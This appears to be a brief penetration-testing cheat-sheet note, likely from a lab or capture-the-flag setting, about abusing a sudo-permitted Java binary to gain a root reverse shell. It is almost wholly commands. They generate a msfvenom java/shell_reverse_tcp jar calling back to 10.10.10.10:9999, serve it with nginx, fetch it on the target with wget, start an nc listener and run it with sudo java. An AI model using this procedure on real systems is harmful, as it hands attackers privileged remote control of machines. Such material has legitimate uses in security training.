/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
Try with other java versions, multi-step process
a)craft a reverse shell payload with msfvenom
sudo msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9999 -f jar -o reverse.jat
b) Move into a jar file
sudo mv reverse.jat reverse.jar
c)
sudo mv reverse.jar /var/www/html
d) Start an nginx server for deployment on target
sudo service nginx start
e) From target, wget the payload
wget http://10.10.10.10/reverse.jar
f) From kali start a listener
nc -nvlp 9999
g) Trigger the exploit from target
sudo /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar /tmp/reverse.jar
Last updated